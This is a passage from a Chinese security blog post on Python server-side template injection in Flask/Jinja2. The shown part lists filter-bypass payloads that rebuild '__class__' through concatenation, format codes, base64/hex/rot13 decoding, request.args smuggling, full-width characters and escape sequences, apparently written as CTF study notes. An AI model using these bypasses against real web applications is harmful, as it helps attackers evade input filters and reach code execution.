<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">''</span>[<span class="string">'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)+<span class="string">'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)+<span class="string">'class'</span>+<span class="string">'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)+<span class="string">'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)]&#125;&#125;</span><br></pre></td></tr></table></figure>



</li>
</ol>
<h6 id="3-过滤了’-’号"><a href="#3-过滤了’-’号" class="headerlink" title="3)过滤了’.’号"></a>3)过滤了’.’号</h6><ol>
<li><p>用中括号来代替。</p>
<p>例：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'__class__'</span>]等价于<span class="string">''</span>.__class__</span><br></pre></td></tr></table></figure>



</li>
</ol>
<ol start="2">
<li><p>用<code>__getattribute__</code>函数来代替</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>.__getattribute__(<span class="string">'__class__'</span>)</span><br></pre></td></tr></table></figure>



</li>
</ol>
<ol start="3">
<li><p>用<code>attr()</code>函数来代替</p>
<p>例：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'__class'</span>__]等价于<span class="string">''</span>|attr(<span class="string">'__class__'</span>)</span><br></pre></td></tr></table></figure>



</li>
</ol>
<h6 id="4-关键词字符过滤"><a href="#4-关键词字符过滤" class="headerlink" title="4)关键词字符过滤"></a>4)关键词字符过滤</h6><ol>
<li><p>利用字符串特性将关键词拆绕过。</p>
<p>例：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'__cl'</span>+<span class="string">'ass__'</span>]等价于<span class="string">''</span>.__class__</span><br><span class="line"><span class="comment">#（PS：在url中'+'号最好要编码成%2b！！！）</span></span><br><span class="line"><span class="string">''</span>.__getattribute__(<span class="string">'__cla'</span>+<span class="string">'ss__'</span>)</span><br><span class="line"><span class="comment">#（PS：在url中'+'号最好要编码成%2b！！！）</span></span><br><span class="line"><span class="string">''</span>[<span class="string">'__class'</span>__]等价于<span class="string">''</span>|attr(<span class="string">'__cla'</span>+<span class="string">'ss__'</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>在<code>dir()</code>或<code>__dir__()</code>没有被ban下利用<code>dir()</code>或<code>__dir__()</code>返回值进行拼接。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">''</span>.__dir__()[<span class="number">0</span>][<span class="number">0</span>]+<span class="string">''</span>.__dir__()[<span class="number">0</span>][<span class="number">0</span>]+<span class="string">''</span>.__dir__()[<span class="number">18</span>][<span class="number">2</span>]+<span class="string">''</span>.__dir__()[<span class="number">4</span>][<span class="number">2</span>]+<span class="string">''</span>.__dir__()[<span class="number">1</span>][<span class="number">3</span>]+<span class="string">''</span>.__dir__()[<span class="number">2</span>][<span class="number">2</span>]+<span class="string">''</span>.__dir__()[<span class="number">2</span>][<span class="number">2</span>]+<span class="string">''</span>.__dir__()[<span class="number">0</span>][<span class="number">0</span>]+<span class="string">''</span>.__dir__()[<span class="number">0</span>][<span class="number">0</span>]]</span><br><span class="line"><span class="comment">#在我的环境中，等价于__class__</span></span><br><span class="line"><span class="comment">#''.__dir__()[0][0]=='_'</span></span><br><span class="line"><span class="comment">#''.__dir__()[18][2]==‘c’</span></span><br><span class="line"><span class="comment">#''.__dir__()[4][2]=='a'</span></span><br><span class="line"><span class="comment">#''.__dir__()[1][3]=='l'</span></span><br><span class="line"><span class="comment">#''.__dir__()[2][2]=='s'</span></span><br></pre></td></tr></table></figure>



</li>
</ol>
<ol start="3">
<li><p>‘%c’.format()与’{0:c}’.format()拼接。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">""</span>[<span class="string">'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">99</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">108</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">97</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">115</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">115</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)%<span class="number">2</span><span class="string">b'&#123;0:c&#125;'</span>[<span class="string">'format'</span>](<span class="number">95</span>)]&#125;&#125;等价于<span class="string">''</span>.__class__</span><br><span class="line"><span class="comment">#（PS：在url中'+'号最好要编码成%2b！！！）</span></span><br></pre></td></tr></table></figure>





</li>
</ol>
<ol start="4">
<li><p>进行decode解编码绕过。</p>
<p>例:1.进行base64处理<code>__class__</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'X19jbGFzc19f'</span>.decode(<span class="string">'base64'</span>)]</span><br></pre></td></tr></table></figure>

<p>例:2.进行16进制处理<code>__class__</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'5f5f636c6173735f5f'</span>.decode(<span class="string">'hex'</span>)]</span><br></pre></td></tr></table></figure>

<p>例:3.进行rot13 编码处理<code>__class__</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'__pynff__'</span>.decode(<span class="string">'rot13'</span>)]</span><br></pre></td></tr></table></figure>



</li>
</ol>
<ol start="5">
<li><p>利用request.args，request.values进行传参.</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;""[request.args.class][request.args.x1][request.args.x2][request.args.x3]()[40]&#125;&#125;?class=__class__&amp;x1=__base__&amp;x2=__base__&amp;x3=__subclasses__</span><br></pre></td></tr></table></figure>

<p>若’.’也被过滤可以用’[]’套娃方式代替</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;""[request['args']['c']]&#125;&#125;?c=__class__</span><br></pre></td></tr></table></figure>
</li>
<li><p>利用全角符号来绕过字母过滤(大多数非字母字符不能绕过,python3环境?)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>ｏｐｅｎ</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>&lt;function io.open(file, mode=<span class="string">'r'</span>, buffering=<span class="number">-1</span>, encoding=<span class="literal">None</span>, errors=<span class="literal">None</span>, newline=<span class="literal">None</span>, closefd=<span class="literal">True</span>, opener=<span class="literal">None</span>)&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>＿＿ｉｍｐｏｒｔ</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span> File <span class="string">"&lt;ipython-input-2-78bf7df85c1c&gt;"</span>, line <span class="number">1</span></span><br><span class="line">    ＿＿ｉｍｐｏｒｔ</span><br><span class="line">           ^</span><br><span class="line">SyntaxError: invalid character <span class="keyword">in</span> identifier</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>__ｉｍｐｏｒｔ__</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span> &lt;function __import__&gt;</span><br></pre></td></tr></table></figure>

<p>7.利用模板渲染编码绕过：（部分版本）</p>
<p>​     7.1：16进制（<code>\xXX</code>）绕过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F'</span>]  <span class="comment">#''.__class__</span></span><br></pre></td></tr></table></figure>

<p>​     7.2：8进制（<code>\OOO</code>）绕过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>[<span class="string">'\137\137\143\154\141\163\163\137\137'</span>]  <span class="comment">#''.__class__</span></span><br></pre></td></tr></table></figure>

<p>​     7.3：unicode（<code>\uXXXX</code>or<code>\UXXXXXXXX</code>）绕过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">\uXXXX:</span><br><span class="line">    <span class="string">''</span>[<span class="string">'\u005F\u005F\u0063\u006C\u0061\u0073\u0073\u005F\u005F'</span>]  <span class="comment">#''.__class__</span></span><br><span class="line">\UXXXXXXXX:</span><br><span class="line">    <span class="string">''</span>[<span class="string">'\U0000005F\U0000005F\U00000063\U0000006C\U00000061\U00000073\U00000073\U0000005F\U0000005F'</span>]  <span class="comment">#''.__class__</span></span><br></pre></td></tr></table></figure>



</li>
</ol>
<h6 id="5-过滤了‘-’or‘-’"><a href="#5-过滤了‘-’or‘-’" class="headerlink" title="5)过滤了‘{ {’or‘} }’"></a>5)过滤了‘{ {’or‘} }’</h6><p>可以用<code>{ % % }</code>来代替<code>{ {} }</code>，但要注意两者区别： <code>{ {} }</code>是用来变量取值，<code>{ { % % } }</code>是用来控制结构。 </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">if</span> <span class="string">'1'</span>==<span class="string">'code'</span> %&#125;lexsD6&#123;% endif %&#125;</span><br></pre></td></tr></table></figure>



<h2 id="0x0参考文献"><a href="#0x0参考文献" class="headerlink" title="0x0参考文献"></a>0x0参考文献</h2><p>1.<a href="https://blog.csdn.net/answer3lin/article/details/86572575" target="_blank" rel="noopener">https://blog.csdn.net/answer3lin/article/details/86572575</a></p>
<p>2.<a href="https://docs.python.org/zh-cn/3/" target="_blank" rel="noopener">https://docs.python.org/zh-cn/3/</a></p>
<p>3.<a href="https://www.anquanke.com/post/id/188172#h3-2" target="_blank" rel="noopener">https://www.anquanke.com/post/id/188172#h3-2</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于python ssti的思考</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">lexsd6</a></p>
        <p><span>发布时间:</span>2020-03-27, 09:51:37</p>
        <p><span>最后更新:</span>2020-11-27, 17:35:29</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/" title="关于python ssti的思考">lexsd6.github.io/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/</a>
            <span class="copy-path" data-clipboard-text="原文: lexsd6.github.io/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/　　作者: lexsd6" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2020/04/21/%E8%99%8E%E7%AC%A6CTF2020--EasyLogin%20%20%20Write%20%20up/">
                    虎符CTF2020--EasyLogin WP
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/11/13/%E5%85%B3%E4%BA%8Eupdatexml()%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E7%9A%84%E6%80%9D%E8%80%83/">
                    关于updatexml()报错注入的思考
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1关于ssti的讲解"><span class="toc-text">0x1关于ssti的讲解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2python基础"><span class="toc-text">0x2python基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#01-python魔术方法"><span class="toc-text">01.python魔术方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#02-文件操作和命令执行相关的python模块"><span class="toc-text">02.文件操作和命令执行相关的python模块</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#1-builtins模块"><span class="toc-text">1)builtins模块</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#2）os模块"><span class="toc-text">2）os模块</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#3-platform模块"><span class="toc-text">3)platform模块</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#4-timeit-模块"><span class="toc-text">4)timeit 模块</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#5-commands模块"><span class="toc-text">5)commands模块</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#6-subprocess模块"><span class="toc-text">6)subprocess模块</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#03-一些提高效率的函数"><span class="toc-text">03.一些提高效率的函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#04-关于flask"><span class="toc-text">04.关于flask</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-config"><span class="toc-text">1) config</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-request"><span class="toc-text">2)request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-session"><span class="toc-text">3)session</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-g"><span class="toc-text">4)g</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-url-for"><span class="toc-text">5)url_for()</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#6-get-flashed-messages"><span class="toc-text">6)get_flashed_messages()</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3ssti注入的一般攻击流程"><span class="toc-text">0x3ssti注入的一般攻击流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4常见绕过方式"><span class="toc-text">0x4常见绕过方式</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#1-过滤中括号"><span class="toc-text">1)过滤中括号</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#2-过滤双下划线"><span class="toc-text">2)过滤双下划线</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#3-过滤了’-’号"><span class="toc-text">3)过滤了’.’号</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#4-关键词字符过滤"><span class="toc-text">4)关键词字符过滤</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#5-过滤了‘-’or‘-’"><span class="toc-text">5)过滤了‘{ {’or‘} }’</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x0参考文献"><span class="toc-text">0x0参考文献</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-4 i,
        .toc-level-4 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"关于python ssti的思考　| lexsd6's home　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2020/04/21/%E8%99%8E%E7%AC%A6CTF2020--EasyLogin%20%20%20Write%20%20up/" title="上一篇: 虎符CTF2020--EasyLogin WP">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/11/13/%E5%85%B3%E4%BA%8Eupdatexml()%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E7%9A%84%E6%80%9D%E8%80%83/" title="下一篇: 关于updatexml()报错注入的思考">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/11/02/PWN%20Hunting%20challenge%20%E2%80%94%20HTB/">Hunting— HTB  PWN  challenge</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/10/20/xman%E7%9A%84leve5%E5%8F%A6%E4%B8%80%E7%A7%8D%E8%A7%A3%E6%B3%95(mprotect)%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%88%A9%E7%94%A8/">xman的leve5另一种解法(mprotect)学习与利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/09/21/ctfshow-%E6%9C%88%E9%A5%BC%E6%9D%AF-pwn-wp/">ctfshow-月饼杯2021-pwn-wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/09/16/'could%20not%20patch%20the%20PLT%20stub;%20unexpected%20PLT%20format%20or%20the%20file%20has%20been%20modified%20after%20linking!'%E6%8A%A5%E9%94%99%E7%BC%93%E8%A7%A3%E6%96%B9%E6%B3%95/">\`could not patch the PLT stub; unexpected PLT format or the file has been modified after linking!\`报错缓解方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/09/03/5%E7%A7%8D%E5%AD%97%E7%AC%A6%E6%9E%84%E9%80%A0php_shellcode/">5种字符'(^.9)'构造php_shellcode</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/08/17/ractf2021-pwn-ctf/">ractf2021-pwn-ctf</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/07/28/imaginaryctf2021--pwn-wp/">imaginaryctf2021-pwn-wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/07/12/%E9%AB%98%E7%89%88%E6%9C%AClibc(2.29-2.32)%20off%20by%20null%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BF%E6%80%BB%E7%BB%93/">高版本libc(2.29-2.32) off by null利用姿势笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/06/26/2021qwb%20pwn%20wp/">2021qwb-pwn-初赛-wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/28/ISCC2021%20PWN%20WP/">ISCC2021 PWN部分 WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/22/ret2dl-resolve%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%E5%B0%8F%E8%AE%B0/">ret2dl-resolve利用方法小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/20/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E4%B8%8ESROP%E6%96%B9%E6%B3%95%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">系统调用与SROP方法学习笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/02/heap%E6%B3%84%E9%9C%B2%E7%9C%9F%E5%AE%9E%E5%9C%B0%E5%9D%80tirck/">pwn堆题泄露libc真实地址小tirck</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/28/CTF%202021%20PWN%20babyheap%20%20%E5%A4%8D%E7%8E%B0%E8%AE%B0/">2021*CTF_PWN_babyheap复现记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/25/%E5%85%B3%E4%BA%8E%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%88%A9%E7%94%A8%E2%80%94%E2%80%94%E5%AD%A6pwn%E5%B0%8F%E8%AE%B0(9)/">关于格式化字符串利用——学pwn小记(9)</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/17/Tcache%20attack%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E5%AD%A6pwn%E5%B0%8F%E8%AE%B0(8)/">Tcache attack初学习——学pwn小记(8)</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/09/%E4%BB%8E%E5%AF%B9b00k%E9%A2%98%E7%9B%AEwp%E5%AD%A6%E4%B9%A0%E5%88%9D%E4%B9%A0off-by-one%E2%80%94%E2%80%94%E5%AD%A6pwn%E5%B0%8F%E8%AE%B0(7)/">从对b00k题目学习中初习off-by-one——学pwn小记(7)</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/08/actf--wp/">ångstromCTF 2021--wp与复现记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/25/%E4%BF%AE%E6%94%B9ELF%E6%96%87%E4%BB%B6libc%E4%B8%BA%E6%8C%87%E5%AE%9A%E7%89%88%E6%9C%AC/">修改ELF文件libc为指定版本</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/14/%E5%8A%AB%E6%8C%81hook%E5%87%BD%E6%95%B0%E2%80%94%E2%80%94%E5%AD%A6pwn%E5%B0%8F%E8%AE%B0(6)/">劫持hook函数——学pwn小记(6)</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/11/fastbin%E4%BA%8C%E6%AC%A1%E9%87%8A%E6%94%BE%E2%80%94%E2%80%94%E5%AD%A6pwn%E5%B0%8F%E8%AE%B0(5)/">fastbin二次释放——学pwn小记(5)</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/15/%E7%BD%91%E9%BC%8E%E6%9D%AF%202018-Comment%20%20%E5%A4%8D%E7%8E%B0%E7%AC%94%E8%AE%B0/">网鼎杯 2018-Comment  复现笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/31/%E5%85%B3%E4%BA%8Esql%E6%B3%A8%E5%85%A5bypass%E6%80%BB%E7%BB%93/">关于sql注入bypass总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/08/%E5%AE%89%E6%B4%B5%E6%9D%AF2019%E5%A4%8D%E7%8E%B0/">安洵杯2019复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/07/xman%20pwn%E9%A2%98%E5%A4%8D%E7%8E%B0/">xman pwn题复现——学pwn小记（4）</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/31/flask.request%E7%9A%84%E5%86%85%E7%BD%AE%E5%B1%9E%E6%80%A7%E6%80%BB%E7%BB%93/">flask.request的内置属性总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/30/%E5%AF%B9php%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%BD%92%E7%BA%B3/">对php伪协议的归纳</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/21/HWCTF-%E5%8D%8E%E4%B8%BA%E4%BA%91%E5%9C%BAWP/">HWCTF-华为云场WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/16/linux%20%E5%86%85%E7%BD%AE%E5%8F%82%E6%95%B0%E6%95%B4%E7%90%86/">linux 内置参数整理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/">关于jinja2特性对ssti的bypass的影响</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/16/%E5%85%B3%E4%BA%8Ephp%E6%89%A7%E8%A1%8C%E4%B8%8E%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%A4%84%E7%90%86%E5%87%BD%E6%95%B0%E6%95%B4%E7%90%86/">php执行与文件系统处理函数整理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/15/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B-wp/">第五届上海市大学生网络安全大赛-初赛wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/12/ctf-show_%E5%8E%9F%E8%B0%85%E6%9D%AFwp/">ctf-show_原谅杯wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/26/ctf-show%201024%E6%9D%AF/">ctf-show 1024杯</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/15/%E5%AD%A6%E4%B9%A0pwn%E5%B0%8F%E8%AE%B0(3)/">Linux_x64下的ret2bilc与ret2csu--学习pwn小记(3)</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/22/%E7%AC%AC%E5%8D%81%E4%B8%89%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B-%E5%88%9B%E6%96%B0%E5%AE%9E%E8%B7%B5%E8%83%BD%E5%8A%9B%E8%B5%9B%E8%A5%BF%E5%8D%97%E8%B5%9B%E5%8C%BA%E9%80%89%E6%8B%94%E8%B5%9Bwp/">第十三届全国大学生信息安全竞赛-创新实践能力赛西南赛区选拔赛wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/13/%E5%AD%A6%E4%B9%A0pwn%E5%B0%8F%E8%AE%B0(2)/">学习pwn小记(2)</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/10/%E5%AF%B9linux%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E6%80%BB%E7%BB%93/">对linux 命令执行的总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/09/%E5%AD%A6%E4%B9%A0pwn%E5%B0%8F%E8%AE%B0(1)/">学习pwn小记(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">关于SQL注入小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/26/%E5%AE%89%E6%81%92DASCTF%207%E6%9C%88%E8%B5%9BWP/">安恒DASCTF 7月赛WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/15/rgbCTF--wp/">sctf2020 pythonbox题目复现小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/18/NahamCon%20CTF%20WP/">NahamCon CTF WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/31/%E5%AF%B9%E4%BA%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%9F%A5%E8%AF%86%E6%A2%B3%E7%90%86/">对于文件包含漏洞的知识梳理</a></li><li class="post-list-item"><a class="post-list-link" 